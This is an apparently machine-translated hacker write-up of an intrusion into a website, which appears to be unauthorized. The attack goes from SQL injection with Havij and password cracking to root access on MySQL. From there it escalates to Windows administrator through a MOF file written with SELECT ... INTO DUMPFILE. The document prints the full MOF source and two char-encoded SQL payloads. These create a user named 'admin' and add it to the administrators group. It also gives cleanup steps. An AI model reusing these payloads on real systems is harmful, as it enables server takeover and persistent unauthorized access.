A detailed description of the MySQL Remote MOF power utilization method without shell case

Source: Internet
Author: User

sweep to the injection of a station
<ignore_js_op>
in Havij, get the database password saved by MySQL library in MySQL database:
<ignore_js_op>
sometimes found 1.15 version of the best use, the most stable, although the speed is a bit slow.
and put it in the jar and let the oil break.
<ignore_js_op>
thank mr.lu. By the way, cmd5 even a root charge ...
While waiting for the password to crack out of the way to nmap a bit
<ignore_js_op>
The accidental discovery Port changed to 1126, saving a lot of time for the back.
Try it out as usual .
<ignore_js_op>
In the Last post there is a friend asked this software is what, I use is navicat, feel very useful
now the conventional idea is to get the absolute path, write a pony, and then further penetrate.
but the site does not have a path to see the path of MySQL
with SELECT @ @basedir; commands can be seen;
<ignore_js_op>
the path of the site is probably about the same, too lazy a try, the recent MOF power is quite fire, the last failure of a once, this time to try again.
MOF a lot of popular science, we are interested to see the network disk link two, very detailed, we learn together;

http://pan.baidu.com/share/link?shareid=438074&uk=101689864

http://pan.baidu.com/share/link?shareid=438077&uk=101689864The MOF file contents are:

  1. #pragma namespace ("\\\\.\\root\\subscription")
  2. Instance of __EventFilter as $EventFilter
  3. {
  4. Eventnamespace = "root\\cimv2";
  5. Name = "FiltP2";
  6. Query = "SELECT * from __InstanceModificationEvent"
  7. "Where targetinstance Isa \" Win32_localtime\ ""
  8. "And Targetinstance.second = 5";
  9. QueryLanguage = "WQL";
  10. };
  11. Instance of Activescripteventconsumer as $Consumer
  12. {
  13. Name = "ConsPCSV2";
  14. Scriptingengine = "JScript";
  15. ScriptText =
  16. "var WSH = new ActiveXObject (\" Wscript.shell\ ") \nwsh.run (\" Net.exe user admin admin/add\ ")";
  17. };
  18. Instance of __filtertoconsumerbinding
  19. {
  20. Consumer = $Consumer;
  21. Filter = $EventFilter;
  22. };
Copy Code


In the absence of a horse, can not follow the net in the words of the first to pass a MOF up, I write directly once.
First try to directly write the original statement, the hint failed, the reason is that there are many "; enter" symbols in the statement.
Then you want to convert to a 16 or ASC code.
Try the 16 binary first.
Wait for long time what or landing not up, give up, instead of ASC code, with the SQL statement:

  1. Select char ( 35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98 , 115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,11 6,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101 , 110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97 , 109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,11 6,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,1 10,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,1 10,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,3 2,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32 , 32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,9 7,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114 , 32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,6 7,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105 , 112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,3 2,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108 , 108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110 , 32,97,100,109,105,110,32,47,97,100, 100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114 , 84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101 , 114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101 , 110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile   ' c:/windows/system32/wbem/mof/ Nullevt.mof ';
Copy Code


The effect is to add a user admin password admin;
After waiting for 5 seconds, the login box prompts from
<ignore_js_op>
Become a
<ignore_js_op> [Size=0.83em]uploaded 17 hours ago
Download Accessories [Size=0.83em] (51.04 KB)



This time to realize a problem, the above statement only added users, forgot to upgrade to the administrator ...
All right, write it again. MOF

  1. Select char ( 35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98 , 115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,11 6,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101 , 110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97 , 109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,11 6,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,1 10,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,1 10,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,3 2,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32 , 32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,9 7,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114 , 32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,6 7,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105 , 112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,3 2,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108 , 108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112 , 32, 97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116 , 97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,10 3,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32 , 32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile   ' C:/windows/system32/wbem/mof/nullevt.mof ';
Copy Code

OK, so it went in smoothly;
<ignore_js_op>

Let's study it one more time. Add Administrator try

Now by default it will be added to the user 5s once, the workaround is:
The first net stop WinMgmt stops the service,
Second Delete folder: C:\WINDOWS\system32\wbem\Repository\
Third net start WinMgmt startup service
There are other ways to write in the file of the net disk.

All the way looks smooth, because the last time I studied this. This time I wrote it in more detail.

A detailed description of the MySQL Remote MOF power utilization method without shell case

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.